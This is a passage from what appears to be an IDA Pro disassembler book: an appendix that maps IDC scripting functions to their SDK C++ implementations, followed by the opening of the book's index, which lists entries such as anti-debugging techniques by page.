GetEventModuleName return qstrdup(get_debug_event()->modinfo.name);

GetEventModuleSize return get_debug_event()->modinfo.size;

GetEventPid return get_debug_event()->pid;

GetEventTid return get_debug_event()->tid;

GetExceptionCode excvec_t *ev = retrieve_exceptions();

return idx < ev->size() ? (*ev)[idx].code : 0;

GetExceptionFlags excvec_t *ev = retrieve_exceptions();

for (excvec_t::iterator i = ev->begin(); i != ev->end(); i++)

if ((*i).code == code)

return (*i).flags;

return -1;

GetExceptionName excvec_t *ev = retrieve_exceptions();

for (excvec_t::iterator i = ev->begin(); i != ev->end(); i++)

if ((*i).code == code)

return new qstring((*i).name);

return NULL;

GetExceptionQty return retrieve_exceptions()->size();

GetFchunkAttr func_t *f = get_func(ea);

return internal_get_attr(f, attr);

GetFchunkReferer func_t *f = get_fchunk(ea);

func_parent_iterator_t fpi(f);

return n < f->refqty ? f->referers[n] : BADADDR;

GetFirstBmask return get_first_bmask(enum_id);

GetFirstConst return get_first_const(enum_id, bmask);

GetFirstHashKey netnode n(id).hash1st(buf, sizeof(buf));

return qstrdup(buf);

GetFirstIndex return netnode n(id).sup1st(tag);

GetFirstMember return get_struc_first_offset(get_struc(id));

GetFirstModule module_info_t modinfo;

get_first_module(&modinfo);

return modinfo.base;

GetFirstStrucIdx return get_first_struc_idx();

GetFixupTgtDispl fixup_data_t fd;

get_fixup(ea, &fd);

return fd.displacement;

GetFixupTgtOff fixup_data_t fd;

get_fixup(ea, &fd);

return fd.off

GetFixupTgtSel fixup_data_t fd;

get_fixup(ea, &fd);

return fd.sel;

IDC Function SDK Implementation

IDC/SDK Cross-Reference 593

GetFixupTgtType fixup_data_t fd;

get_fixup(ea, &fd);

return fd.type;

GetFlags getFlags(ea);

GetFpNum //*** undocumented function

char buf[16];

union {float f; double d; long double ld} val;

get_many_bytes(ea, buf, len > 16 ? 16 : len);

ph.realcvt(buf, &val, (len >> 1) - 1);

return val;

GetFrame //macro, see GetFunctionAttr

GetFrameArgsSize //macro, see GetFunctionAttr

GetFrameLvarSize //macro, see GetFunctionAttr

GetFrameRegsSize //macro, see GetFunctionAttr

GetFrameSize return get_frame_size(get_func(ea));

GetFuncOffset int flags = GNCN_REQFUNC | GNCN_NOCOLOR;

get_nice_colored_name(ea, buf, sizeof(buf),flags);

return qstrdup(buf);

GetFunctionAttr func_t *f = get_func(ea);

return internal_get_attr(f, attr);

GetFunctionCmt return get_func_cmt(get_func(ea), repeatable);

GetFunctionFlags //macro, see GetFunctionAttr

GetFunctionName get_func_name(ea, buf, sizeof(buf));

return qstrdup(buf);

GetHashLong netnode n(id).hashval_long(idx);

GetHashString netnode n(id).hashval(idx, buf, sizeof(buf));

return qstrdup(buf);

GetIdaDirectory qstrncpy(buf, idadir(NULL), sizeof(buf));

return qstrdup(buf);

GetIdbPath qstrncpy(buf, database_idb, sizeof(buf));

return qstrdup(buf);

GetInputFile get_root_filename(buf, sizeof(buf));

return qstrdup(buf);

GetInputFilePath RootNode.valstr(buf, sizeof(buf));

return qstrdup(buf);

GetInputMD5 uint8_t md5bin[16];

char out[1024];

char *outp = out;

int len = sizeof(out);

out[0] = 0;

RootNode.supval(RIDX_MD5, md5bin, sizeof(md5bin));

for (int j = 0; j < sizeof(md5bin); j++) {

int nbytes = qsnprintf(out, len, "%02X", md5bin[j]);

outp += nbytes;

len -= nbytes;

}

return qstrdup(out);

GetLastBmask return get_last_bmask(enum_id);

GetLastConst return get_last_const(enum_id, bmask);

IDC Function SDK Implementation

594 Appendix B

GetLastHashKey netnode n(id).hashlast(buf, sizeof(buf));

return qstrdup(buf);

GetLastIndex return netnode n(id).suplast(tag);

GetLastMember return get_struc_last_offset(get_struc(id));

GetLastStrucIdx return get_last_struc_idx();

GetLineNumber return get_source_linnum(ea);

GetLocalType const type_t *type;

const p_list *fields;

get_numbered_type(idati, ordinal, &type, &fields,

NULL, NULL, NULL);

char *name = get_numbered_type_name(idati, ordinal);

qstring res;

print_type_to_qstring(&res, 0, 2, 40, flags, idati, type,

name, NULL, fields, NULL);

return qstrdup(res.c_str());

GetLocalTypeName return qstrdup(get_numbered_type_name(idati, ordinal));

GetLongPrm if (offset <= 188)

return *(int*)(offset + (char*)&inf);

GetManualInsn get_manual_insn(ea, buf, sizeof(buf));

return qstrdup(buf);

GetManyBytes uint8_t *out = (uint8_t*)qalloc(size + 1);

if (use_dbg)

if (dbg && (dbg->may_disturb() || get_process_state() < 0))

dbg->read_memory(ea, out, size);

else

qfree(out);

out = NULL;

else

get_many_bytes(ea, out, size);

return out;

GetMarkComment curloc loc.markdesc(slot, buf, sizeof(buf));

return qstrdup(buf);

GetMarkedPos return curloc loc.markedpos(&slot);

GetMaxLocalType return get_ordinal_qty(idati);

GetMemberComment tid_t m = get_member(get_struc(id), offset)->id;

netnode n(m).supstr(repeatable ? 1 : 0, buf, sizeof(buf));

return qstrdup(buf);

GetMemberFlag return get_member(get_struc(id), offset)->flag;

GetMemberName tid_t m = get_member(get_struc(id), offset)->id;

get_member_name(m, buf, sizeof(buf));

return qstrdup(buf);

GetMemberOffset return get_member_by_name(get_struc(id), member_name)->soff;

GetMemberQty get_struc(id)->memqty;

GetMemberSize member_t *m = get_member(get_struc(id), offset);

return get_member_size(m);

GetMemberStrId tid_t m = get_member(get_struc(id), offset)->id;

return netnode n(m).altval(3) - 1;

GetMinSpd func_t *f = get_func(ea);

return f ? get_min_spd_ea(f) : BADADDR;

IDC Function SDK Implementation

IDC/SDK Cross-Reference 595

GetMnem ua_mnem(ea, buf, sizeof(buf));

return qstrdup(buf);

GetModuleName module_info_t modinfo;

if (base == 0)

get_first_module(&modinfo);

else

modinfo.base = base - 1;

get_next_module(&modinfo);

return qstrdup(modinfo.name);

GetModuleSize module_info_t modinfo;

if (base == 0)

get_first_module(&modinfo);

else

modinfo.base = base - 1;

get_next_module(&modinfo);

return modinfo.size;

GetNextBmask return get_next_bmask(eum_id, value);

GetNextConst return get_next_const(enum_id, value, bmask);

GetNextFixupEA return get_next_fixup_ea(ea);

GetNextHashKey netnode n(id).hashnxt(idx, buf, sizeof(buf));

return qstrdup(buf);

GetNextIndex return netnode n(id).supnxt(idx, tag);

GetNextModule module_info_t modinfo;

modinfo.base = base;

get_next_module(&modinfo);

return modinfo.base;

GetNextStrucIdx return get_next_struc_idx();

GetOpType *buf = 0;

if (isCode(get_flags_novalue(ea)))

ua_ana0(ea);

return cmd.Operands[n].type;

GetOperandValue Use ua_ana0 to fill command struct then return

appropriate value based on cmd.Operands[n].type

GetOpnd *buf = 0;

if (isCode(get_flags_novalue(ea)))

ua_outop2(ea, buf, sizeof(buf), n);

tag_remove(buf, buf, sizeof(buf));

return qstrdup(buf);

GetOriginalByte return get_original_byte(ea);

GetPrevBmask return get_prev_bmask(enum_id, value);

GetPrevConst return get_prev_const(enum_id, value, bmask);

GetPrevFixupEA return get_prev_fixup_ea(ea);

GetPrevHashKey netnode n(id).hashprev(idx, buf, sizeof(buf));

return qstrdup(buf);

GetPrevIndex return netnode n(id).supprev(idx, tag);

GetPrevStrucIdx return get_prev_struc_idx(index);

GetProcessName process_info_t p;

pid_t pid = get_process_info(idx, &p);

return qstrdup(p.name);

GetProcessPid return get_process_info(idx, NULL);

IDC Function SDK Implementation

596 Appendix B

GetProcessQty return get_process_qty();

GetProcessState return get_process_state();

GetReg return getSR(ea, str2reg(reg));

GetRegValue regval_t r;

get_reg_val(name, &r);

if (is_reg_integer(name))

return (int)r.ival;

else

//memcpy(result, r.fval, 12);

GetSegmentAttr segment_t *s = get_seg(segea);

return internal_get_attr(s, attr);

GetShortPrm if (offset <= 190)

return *(unsigned short*)(offset + (char*)&inf);

GetSourceFile return qstrdup(get_sourcefile(ea));

GetSpDiff return get_sp_delta(get_func(ea), ea);

GetSpd return get_spd(get_func(ea), ea);

GetString if (len == -1)

len = get_max_ascii_length(ea, type, true);

get_ascii_contents(ea, len, type, buf, sizeof(buf));

return qstrdup(buf);

GetStringType return netnode n(ea).altval(16) - 1;

GetStrucComment get_struc_cmt(id, repeatable, buf, sizeof(buf));

return qstrdup(buf);

GetStrucId return get_struc_by_idx(index);

GetStrucIdByName return get_struc_id(name);

GetStrucIdx return get_struc_idx(id);

GetStrucName get_struc_name(id, buf, sizeof(buf));

return qstrdup(buf);

GetStrucNextOff return get_struc_next_offset(get_struc(id), offset);

GetStrucPrevOff return get_struc_prev_offset(get_struc(id), offset);

GetStrucQty return get_struc_qty();

GetStrucSize return get_struc_size(id);

GetTestId //*** undocumented, returns internal testId

GetThreadId return getn_thread(idx);

GetThreadQty return get_thread_qty();

GetTinfo //no comparable return type in SDK, generally uses get_tinfo

GetTrueName //macro, see GetTrueNameEx

GetTrueNameEx return qstrdup(get_true_name(from, ea, buf, sizeof(buf)));

GetType get_ti(ea, tbuf, sizeof(tbuf), plist, sizeof(plist));

print_type_to_one_line(buf, sizeof(buf), idati,

tbuf, NULL, NULL, plist, NULL);

return qstrdup(buf);

GetnEnum return getn_enum(idx);

GetVxdFuncName //*** undocumented function

get_vxd_func_name(vxdnum, funcnum, buf, sizeof(buf));

return qstrdup(buf);

IDC Function SDK Implementation

IDC/SDK Cross-Reference 597

GetXML valut_t res;

get_xml(path, &res);

return res;

GuessType guess_type(ea, tbuf, sizeof(tbuf), plist, sizeof(plist));

print_type_to_one_line(buf, sizeof(buf), idati, tbuf,

NULL, NULL, plist, NULL);

return qstrdup(buf);

HideArea add_hidden_area(start, end, description, header, footer, color);

HighVoids //macro, see SetLongPrm

IdbByte return get_db_byte(ea);

Indent //macro, see SetCharPrm

IsBitfield return is_bf(enum_id);

IsEventHandled return get_debug_event()->handled;

IsFloat //IDC variable type query, n/a for SDK

IsLong //IDC variable type query, n/a for SDK

IsObject //IDC variable type query, n/a for SDK

IsString //IDC variable type query, n/a for SDK

IsUnion return get_struc(id)->is_union();

ItemEnd return get_item_end(ea);

ItemHead return get_item_head(ea);

ItemSize return get_item_end(ea) - ea;

Jump jumpto(ea);

LineA netnode n(ea).supstr(1000 + num, buf, sizeof(buf));

return qstrdup(buf);

LineB netnode n(ea).supstr(2000 + num, buf, sizeof(buf));

return qstrdup(buf);

LoadDebugger load_debugger(dbgname, use_remote);

LoadTil return add_til2(name, 0);

LocByName return get_name_ea(-1, name);

LocByNameEx return get_name_ea(from, name);

LowVoids //macro, see SetLongPrm

MK_FP return ((seg<<4) + off);

MakeAlign doAlign(ea, count, align);

MakeArray typeinfo_t ti;

flags_t f = get_flags_novalue(ea);

get_typeinfo(ea, 0, f, &ti);

asize_t sz = get_data_elsize(ea, f, &ti);

do_data_ex (ea, f, sz * nitems, ti.tid);

MakeByte //macro, see MakeData

MakeCode ua_code(ea);

MakeComm set_cmt(ea, cmt, false);

MakeData do_data_ex(ea, flags, size, tid);

MakeDouble //macro, see MakeData

MakeDword //macro, see MakeData

MakeFloat //macro, see MakeData

IDC Function SDK Implementation

598 Appendix B

MakeFrame func_t *f = get_func(ea);

set_frame_size(f, lvsize, frregs, argsize);

return f->frame;

MakeFunction add_func(start, end);

MakeLocal func_t *f = get_func(ea);

if (*location != '[')

add_regvar(f, start, end, location, name, NULL);

else

struc_t *fr = get_frame(f);

int start = f->frsize + offset;

if (get_member(fr, start))

set_member_name(fr, start, name);

else

add_struc_member(fr, name, start, 0x400, 0, 1);

MakeNameEx set_name(ea, name, flags);

MakeOword //macro, see MakeData

MakePackReal //macro, see MakeData

MakeQword //macro, see MakeData

MakeRptCmt set_cmt(ea, cmt, true);

MakeStr int len = endea == -1 ? 0 : endea - ea;

make_ascii_string(ea, len, current_string_type);

MakeStructEx netnode n(strname);

nodeidx_t idx = (nodeidx_t)n;

if (size != -1)

do_data_ex(ea, FF_STRU, size, idx);

else

size_t sz = get_struc_size(get_struc(idx));

do_data_ex(ea, FF_STRU, sz, idx);

MakeTbyte //macro, see MakeData

MakeUnkn do_unknown(ea, flags);

MakeUnknown do_unknown_range(ea, size, flags);

MakeVar doVar(ea);

MakeWord //macro, see MakeData

MarkPosition curloc loc;

loc.ea = ea; loc.lnnum = lnnum; loc.x = x; loc.y = y;

loc.mark(slot, NULL, comment);

MaxEA //macro, see GetLongPrm

Message msg(format, ...);

MinEA //macro, see GetLongPrm

MoveSegm return move_segm(get_seg(ea), to, flags);

Name return qstrdup(get_name(-1, ea, buf, sizeof(buf)));

NameEx return qstrdup(get_name(from, ea, buf, sizeof(buf)));

NextAddr return nextaddr(ea);

NextFchunk return funcs->getn_area(funcs->get_next_area(ea))->startEA;

NextFuncFchunk func_tail_iterator_t fti(get_func(funcea), tailea);

return fti.next() ? fti.chunk().startEA : -1;

NextFunction return get_next_func(ea)->startEA;

NextHead return next_head(ea, maxea);

IDC Function SDK Implementation

IDC/SDK Cross-Reference 599

NextNotTail return next_not_tail(ea);

NextSeg int n = segs.get_next_area(ea);

return getnseg (n)->startEA;

OpAlt set_forced_operand(ea, n, str);

OpBinary op_bin(ea, n);

OpChr op_chr(ea, n);

OpDecimal op_dec(ea, n);

OpEnumEx op_enum(ea, n, enumid, serial);

OpFloat op_flt(ea, n);

OpHex op_hex(ea, n);

OpHigh return op_offset(ea, n, REF_HIGH16, target);

OpNot toggle_bnot(ea, n);

OpNumber op_num(ea, n);

OpOctal op_oct(ea, n);

OpOff if (base != 0xFFFFFFFF) set_offset(ea, n, base);

else noType(ea, n);

OpOffEx op_offset(ea, n, reftype, target, base, tdelta);

OpSeg op_seg(ea, n);

OpSign toggle_sign(ea, n);

OpStkvar op_stkvar(ea, n);

OpStroffEx op_stroff(ea, n, &strid, 1, delta);

ParseType qstring in(input);

if (in.last() != ';') in += ';';

flags |= PT_TYP;

if (flags & PT_NDC) flags |= PT_SIL;

else flags &= ~PT_SIL;

flags &= ~PT_NDC;

qstring name, type, fields;

parse_decl(idati, in.c_str(), &name, &type, &fields, flags);

internal_build_idc_typeinfo(&result, &type, &fields);

ParseTypes int hti_flags = (flags & 0x70) << 8;

if (flags & 1) hti_flags |= HTI_FIL;

parse_types2(input, (flags & 2) ? NULL : printer_func,

hti_flags);

PatchByte patch_byte(ea, value);

PatchDbgByte if (qthread_same(idc_debthread))

dbg->write_memory(ea, &value, 1);

else

put_dbg_byte(ea, value);

PatchDword patch_long(ea, value);

PatchWord patch_word(ea, value);

PauseProcess suspend_process();

PopXML pop_xml();

PrevAddr return prevaddr(ea);

PrevFchunk return get_prev_fchunk(ea)->startEA;

PrevFunction return get_prev_func(ea)->startEA;

PrevHead return prev_head(ea, minea);

IDC Function SDK Implementation

600 Appendix B

PrevNotTail return prev_not_tail(ea);

ProcessUiAction return process_ui_action(name, flags);

PushXML push_xml(path);

Qword return get_qword(ea);

RebaseProgram return rebase_program(delta, flags);

RecalcSpd return recalc_spd(cur_ea);

Refresh refresh_idaview_anyway();

RefreshDebuggerMemory invalidate_dbgmem_config();

invalidate_dbgmem_contents(BADADDR, -1);

if (dbg && dbg->stopped_at_debug_event)

dbg->stopped_at_debug_event(true);

RefreshLists callui(ui_list);

RemoveFchunk remove_func_tail(get_func(funcea), tailea);

RenameArray qsnprintf(buf, sizeof(buf), "$ idc_array %s", name);

netnode n(id).rename(newname);

RenameEntryPoint rename_entry(ordinal, name);

RenameSeg set_segm_name(get_seg(ea), "%s", name);

ResumeThread return resume_thread(tid);

Rfirst return get_first_cref_from(From);

Rfirst0 return get_first_fcref_from(From);

RfirstB return get_first_cref_to(To);

RfirstB0 return get_first_fcref_to(To);

Rnext return get_next_cref_from(From, current);

Rnext0 return get_next_fcref_from(From, current);

RnextB return get_next_cref_to(To, current);

RnextB0 return get_next_fcref_to(To, current);

RunPlugin run_plugin(load_plugin(name), arg);

RunTo run_to(ea);

SaveBase char *fname = idbname ? idbname : database_idb;

uint32_t tflags = database_flags;

database_flags = (flags & 4) | (tflags & 0xfffffffb);

bool res = save_database(fname, 0);

database_flags = tflags;

return res;

ScreenEA return get_screen_ea();

SegAddrng //deprecated, see SetSegAddressing

SegAlign //macro, see SetSegmentAttr

SegBounds //deprecated, see SetSegBounds

SegByBase return get_segm_by_sel(base)->startEA;

SegByName sel_t seg;

atos(segname, *seg);

return seg;

SegClass //deprecated, see SetSegClass

IDC Function SDK Implementation

IDC/SDK Cross-Reference 601

SegComb //macro, see SetSegmentAttr

SegCreate //deprecated, see AddSeg

SegDefReg //deprecated, see SetSegDefReg

SegDelete //deprecated, see DelSeg

SegEnd //macro, see GetSegmentAttr

SegName segment_t *s = (segment_t*) get_seg(ea);

get_true_segm_name(s, buf, sizeof(buf));

return qstrdup(buf);

SegRename //deprecated, see RenameSeg

SegStart //macro, see GetSegmentAttr

SelEnd ea_t ea1, ea2;

read_selection(&ea1, &ea2);

return ea2;

SelStart ea_t ea1, ea2;

read_selection(&ea1, &ea2);

return ea1;

SelectThread select_thread(tid);

SetArrayFormat segment_t *s = get_seg(ea);

if (s)

uint32_t format[3];

netnode array(ea);

format[0] = flags;

format[1] = litems;

format[2] = align;

array.supset(5, format, sizeof(format));

SetArrayLong netnode n(id).altset(idx, value);

SetArrayString netnode n(id).supset(idx, str);

SetBmaskCmt set_bmask_cmt(enum_id, bmask, cmt, repeatable);

SetBmaskName set_bmask_name(enum_id, bmask, name);

SetBptAttr bpt_t bpt;

if (get_bpt(ea, &bpt) == 0) return;

if (bpattr == BPTATTR_SIZE) bpt.size = value;

else if (bpattr == BPTATTR_TYPE) bpt.type = value;

else if (bpattr == BPTATTR_COUNT) bpt.pass_count = value;

else if (bpattr == BPTATTR_FLAGS) bpt.flags = value;

update_bpt(&bpt);

SetBptCnd //macro for SetBptCndEx(ea, cnd, 0);

SetBptCndEx bpt_t bpt;

if (get_bpt(ea, &bpt) == 0) return;

bpt. cndbody = cnd;

if (is_lowcnd)

bpt.flags |= BPT_LOWCND;

else

bpt.flags &= ~ BPT_LOWCND;

update_bpt(&bpt);

SetCharPrm if (offset >= 13 && offset <= 191)

*(offset + (char*)&inf) = value;

IDC Function SDK Implementation

602 Appendix B

SetColor if (what == CIC_ITEM)

set_item_color(ea, color);

else if (what == CIC_FUNC)

func_t *f = get_func(ea);

f->color = color;

update_func(f);

else if (what == CIC_SEGM)

segment_t *s = get_seg(ea);

s->color = color;

s->update();

SetConstCmt set_const_cmt(const_id, cmt, repeatable);

SetConstName set_const_name(const_id, name);

SetDebuggerOptions return set_debugger_options(options);

SetEnumBf set_enum_bf(enum_id, flag ? 1 : 0);

SetEnumCmt set_enum_cmt(enum_id, cmt, repeatable);

SetEnumFlag set_enum_flag(enum_id, flag);

SetEnumIdx set_enum_idx(enum_id, idx);

SetEnumName set_enum_name(enum_id, name);

SetEnumWidth return set_enum_width(enum_id, width);

SetExceptionFlags excvec_t *ev = retrieve_exceptions();

for (excvec_t::iterator i = ev->begin(); i != ev->end(); i++)

if ((*i).code == code)

if ((*i).flags == flags)

return true;

else

(*i).flags = flags;

return store_exceptions();

return 0;

SetFchunkAttr func_t *f = get_func(ea);

internal_set_attr(f, attr, value);

update_func(f);

SetFchunkOwner set_tail_owner(get_func(tailea), funcea);

SetFixup fixup_data_t f = {type, targetsel, targetoff, displ};

set_fixup(ea, &f);

SetFlags setFlags(ea, flags);

SetFunctionAttr func_t *f = get_func(ea);

internal_set_attr(f, attr, value);

SetFunctionCmt set_func_cmt (get_func(ea), cmt, repeatable);

SetFunctionEnd func_setend(ea, end);

SetFunctionFlags //macro, see SetFunctionAttr

SetHashLong netnode n(id).hashset(idx, value);

SetHashString netnode n(id).hashset(idx, value);

SetHiddenArea hidden_area_t *ha = get_hidden_area (ea);

ha->visible = visible;

update_hidden_area(ha);

SetInputFilePath if (strlen(path) == 0) RootNode.set("");

else RootNode.set(path);

SetLineNumber set_source_linnum(ea, lnnum);

IDC Function SDK Implementation

IDC/SDK Cross-Reference 603

SetLocalType if (input == NULL || *input == 0)

del_numbered_type(idati, ordinal);

else

qstring name;

qtype type, fields;

parse_decl(idati, input, &name, &type, &fields, flags);

if (ordinal == 0)

if (!name.empty())

get_named_type(idati, name.c_str(),

NTF_TYPE | NTF_NOBASE, NULL, NULL,

NULL, NULL, NULL, &ordinal);

if (!ordinal)

ordinal = alloc_type_ordinal(idati);

set_numbered_type(idati, value, 0, name.c_str(),

type.c_str(), fields.c_str(),

NULL, NULL, NULL);

SetLongPrm if (offset >= 13 && offset <= 188)

*(int*)(offset + (char*)&inf) = value;

SetManualInsn set_manual_insn(ea, insn);

SetMemberComment member_t *m = get_member(get_struc(ea), member_offset);

set_member_cmt(m, comment, repeatable);

SetMemberName set_member_name(get_struc(ea), member_offset, name);

SetMemberType typeinfo_t mt;

//calls an internal function to initialize mt using typeid

int size = get_data_elsize(-1, flag, &mt) * nitems;

set_member_type(get_struc(id), member_offset, flag, &mt,size);

SetProcessorType set_processor_type(processor, level);

SetReg //macro for SetRegEx(ea, reg, value, SR_user);

SetRegEx splitSRarea1(ea, str2reg(reg), value, tag, false);

SetRegValue regval_t r;

if (is_reg_integer(name))

r.ival = (unsigned int)VarLong(value);

else

memcpy(r.fval, VarFloat(value), 12);

set_reg_val(name, &r);

SetRemoteDebugger set_remote_debugger(hostname, password, portnum);

SetSegAddressing set_segm_addressing(get_seg(ea), use32);

SetSegBounds if (get_seg(ea))

set_segm_end(ea, endea, flags);

set_segm_end(ea, startea, flags);

SetSegClass set_segm_class(get_seg(ea), class);

SetSegDefReg SetDefaultRegisterValue(get_seg(ea), str2reg(reg), value);

SetSegmentAttr segment_t *s = get_seg(segea);

internal_set_attr(s, attr, value);

s->update();

SetSegmentType //macro, see SetSegmentAttr

SetSelector set_selector(sel, value);

SetShortPrm if (offset >= 13 && offset <= 190)

*(short*)(offset + (char*)&inf) = value;

IDC Function SDK Implementation

604 Appendix B

SetSpDiff add_user_stkpnt(ea, delta);

SetStatus setStat(status);

SetStrucComment set_struc_cmt(id, cmt, repeatable);

SetStrucIdx set_struc_idx(get_struc(id), index);

SetStrucName set_struc_name(id, name);

SetTargetAssembler set_target_assembler(asmidx);

SetType apply_cdecl(ea, type)

if (get_aflags(ea) & AFL_TILCMT)

set_ti(ea, "", NULL);

SetXML set_xml(path, name, value);

Sleep qsleep(milliseconds);

StartDebugger start_process(path, args, sdir);

StepInto step_into();

StepOver step_over();

StepUntilRet step_until_ret();

StopDebugger exit_process();

StringStp //macro, see SetCharPrm

Tabs //macro, see SetCharPrm

TakeMemorySnapshot take_memory_snapshot(only_loader_segs);

TailDepth //macro, see SetLongPrm

Til2Idb return til2idb(idx, type_name);

Voids //macro, see SetCharPrm

Wait autoWait();

Warning warning(format, ...);

Word return get_full_word(ea);

XrefShow //macro, see SetCharPrm

XrefType Returns value of an internal global variable

____ //*** undocumented function (four underscores)

//returns database creation timestamp

return RootNode.altval(RIDX_ALT_CTIME);

_call //*** undocumented function

//uint32_t _call(uint32_t (*f)())

//f is a pointer in IDA’s (NOT the database’s) address space

return (*f)();

_lpoke //*** undocumented function

//uint32_t _lpoke(uint32_t *addr, uint32_t val)

//addr is an address in IDA’s (NOT the database’s) address

//space. This modifies IDA’s address space NOT the database’s

uint32_t old = *addr;

*addr = val;

return old;

_peek //*** undocumented function

//uint8_t *_peek(uint8_t *addr)

//addr is in IDA’s address space

return *addr;

IDC Function SDK Implementation

IDC/SDK Cross-Reference 605

_poke //*** undocumented function

//uint8_t _lpoke(uint8_t *addr, uint8_t val)

//addr is an address in IDA’s (NOT the database’s) address

//space. This modifies IDA’s address space NOT the database’s

uint8_t old = *addr;

*addr = val;

return old;

_time //*** undocumented function

return _time64(NULL);

add_dref add_dref(From, To, drefType);

atoa ea2str(ea, buf, sizeof(buf));

return qstrdup(buf);

atol return atol(str);

byteValue //macro

del_dref del_dref(From, To);

delattr VarDelAttr(self, attr);

fclose qfclose(handle);

fgetc return qfgetc(handle);

filelength return efilelength(handle);

fopen return qfopen(file, mode);

form //deprecated, see sprintf

fprintf qfprintf(handle, format, ...);

fputc qfputc(byte, handle);

fseek qfseek(handle, offset, origin);

ftell return qftell(handle);

get_field_ea Too complex to summarize

get_nsec_stamp return get_nsec_stamp();

getattr idc_value_t res;

VarGetAttr(self, attr, &res);

return res;

hasattr return VarGetAttr(self, attr, NULL) == 0;

hasName //macro

hasValue //macro

isBin0 //macro

isBin1 //macro

isChar0 //macro

isChar1 //macro

isCode //macro

isData //macro

isDec0 //macro

isDec1 //macro

isDefArg0 //macro

isDefArg1 //macro

isEnum0 //macro

isEnum1 //macro

IDC Function SDK Implementation

606 Appendix B

isExtra //macro

isFlow //macro

isFop0 //macro

isFop1 //macro

isHead //macro

isHex0 //macro

isHex1 //macro

isLoaded //macro

isOct0 //macro

isOct1 //macro

isOff0 //macro

isOff1 //macro

isRef //macro

isSeg0 //macro

isSeg1 //macro

isStkvar0 //macro

isStkvar1 //macro

isStroff0 //macro

isStroff1 //macro

isTail //macro

isUnknown //macro

isVar //macro

lastattr return qstrdup(VarLastAttr(self));

loadfile linput_t *li = make_linput(handle);

file2base(li, pos, ea, ea + size, false);

unmake_linput(li);

ltoa Calls internal conversion routine

mkdir return qmkdir(dirname, mode);

nextattr return qstrdup(VarNextAttr(self, attr));

ord return str[0];

prevattr return qstrdup(VarPrevAttr(self, attr));

print qstring qs;

VarPrint(&qs, arg);

msg("%s\n", qs.c_str());

readlong unsigned int res;

freadbytes(handle, &res, 4, mostfirst);

return res;

readshort unsigned short res;

freadbytes(handle, &res, 2, mostfirst);

return res;

readstr qfgets(buf, sizeof(buf), handle);

return qstrdup(buf);

rename return rename(oldname, newname);

rotate_left return rotate_left(value, count, nbits, offset);

savefile base2file(handle, pos, ea, ea + size);

IDC Function SDK Implementation

IDC/SDK Cross-Reference 607

set_start_cs //macro, see SetLongPrm

set_start_ip //macro, see SetLongPrm

setattr return VarSetAttr(self, attr, value) == 0;

sizeof type_t *t = internal_type_from_idc_typeinfo(type);

return get_type_size(idati, t);

sprintf qstring buf;

buf.sprnt(format, ...);

return qstrdup(buf.c_str());

strfill qstring s;

s.resize(len + 1, &chr);

return new qstring(s);

strlen return strlen(str);

strstr return strstr(str, substr);

substr Calls internal slice routine

trim return new qstring(string.c_str());

unlink return _unlink(filename);

writelong fwritebytes(handle, &dword, 4, mostfirst);

writeshort fwritebytes(handle, &word, 2, mostfirst);

writestr qfputs(str, handle);

xtol return strtoul(str, NULL, 16);

IDC Function SDK Implementation

INDEX

Special Characters & Numbers

#define statements, 257

#hint text# element, 338

#ifdef block, 258

#ifdef/#else block, 258

$ idc_array, 301, 331

$ prefix, 297

$HOME/.idapro/ida.key, 192

$HOME/.idapro/ida.reg file, 44, 207

* (asterisk key), 144

: (colon) hotkey, 107

; (semicolon) hotkey, 107

{ } (bracing) syntax, 254

>> (right-shift operator), 253, 458

1 byte of storage (db), 97

2 bytes of storage (dw), 97

4 bytes of storage (dd), 97

8-byte doubles, 136

32-bit version, vs. 64-bit version, 38

64-bit version, vs. 32-bit version, 38

A hotkey, 122

-A option, 197

-a option, 218

A suffix, ASCII strings, 447

-a switch, 71

Abort command, 205

absolute jumps, 436–437

accept_file function, 359, 362,

365, 367

ACCEPT_FIRST flag, 359

accept_simpleton_file function,

362, 367

accept_simpleton_loader function, 362

access specifiers, IDC, 256

Actions box, Breakpoint Settings

dialog, 526

activation records, 65, 83

ActiveSync, 517

Add Breakpoint option, 463, 523

Add standard structure button, Create

Structure/Union dialog,

143, 152

Add Watch option, 529–530

add_auto_stkpnt2 function, 392, 394

add_entry function, 364

add_segm functions, 308

add_segm_ex function, 308

add_struc function, 307

add_struc_member function, 307

add_til functions, 367

add_til2 function, 367

AddBpt function, 531, 554

AddBptEx function, 531

AddEntryPoint function, 357

AddHotkey function, 261

Address box, Breakpoint Settings

dialog, 524

Address field, Assemble Instruction

dialog, 240

AddressOfEntryPoint field, 351

ADDSEG_XXX values, 308

advanced mode toolbar, 53, 208

aiSee, GDL viewer, 193

AL register, 458

algorithmic analysis, 416

alias = register syntax, 105

alignment, 352

610 INDEX

All segments button, Memory snap-

shot confirmation dialog, 542

allins.hpp file, 235, 303

allmake.mak file, 289

allmake.unx file, 289

Allocate Heap Block option, Func-

tions menu, 471

Allocate Stack Block option, Func-

tions menu, 471

alphabetically sorting, in Functions

window, 82

ALT-B hotkey, 99

alternate display format, selecting, 96

ALT-F8 hotkey, 461

ALT-H hotkey, 207

ALT-K hotkey, 118

ALT-L (Anchor) command, 243

ALT-P hotkey, 230, 424

ALT-Q hotkey, 147

altset function, 300

altvals, 297

ALT-x method, 191

Amini, Pedram, 204

ana function, 391

ana.cpp file, 385

analysis.idc script, 197

analyzer, for processor modules,

385–390

analyzing

algorithms, 416

binary, for different platform, 455

Anchor (ALT-L) command, 243

android_server server component, 570

anterior and posterior lines, 108

anti-debugging

hiding debugger, 555–560

technique, 452–454

and x86emu emulation-oriented

de-obfuscation of binaries,

471–472

anti–dynamic analysis techniques,

449–454

detecting debuggers, 452–453

detecting instrumentation,

451–452

detecting virtualization, 449–451

preventing debugging, 453–454

antipiracy techniques, 32

anti–reverse engineering techniques,

433–434

anti–static analysis techniques,

434–449

disassembly desynchronization,

434–437

dynamically computed target

addresses, 437–444

imported function obfuscation,

444–448

targeted attacks on analysis tools,

448–449

Apache web server, 23

API (Application Programming Inter-

face), 289–314

header files, 290–294

iteration techniques using,

310–314

netnodes, 294–301

creating, 295–297

data storage in, 297–301

deleting, 301

SDK datatypes, 302–303

SDK functions, 304–309

App TRK, 517

Appcall feature, for Bochs, 578–580

Appcall variable, 579

Append Function Tail option, 115

Application option, debugger pro-

cess options dialog, 571

Application Programming Interface.

See API

Apply new signature option, Signa-

tures window, 75

AR_LONG constant, 260

AR_STR constant, 260

ar2idt.exe parser, 231

architectures

of processor modules, 409–411

RISC-style, 387

archive files, 155

area control block, 310

area_t (area.hpp), datatypes for SDK,

291, 293, 302

areacb_t class, 310

areacb_t variables, 310

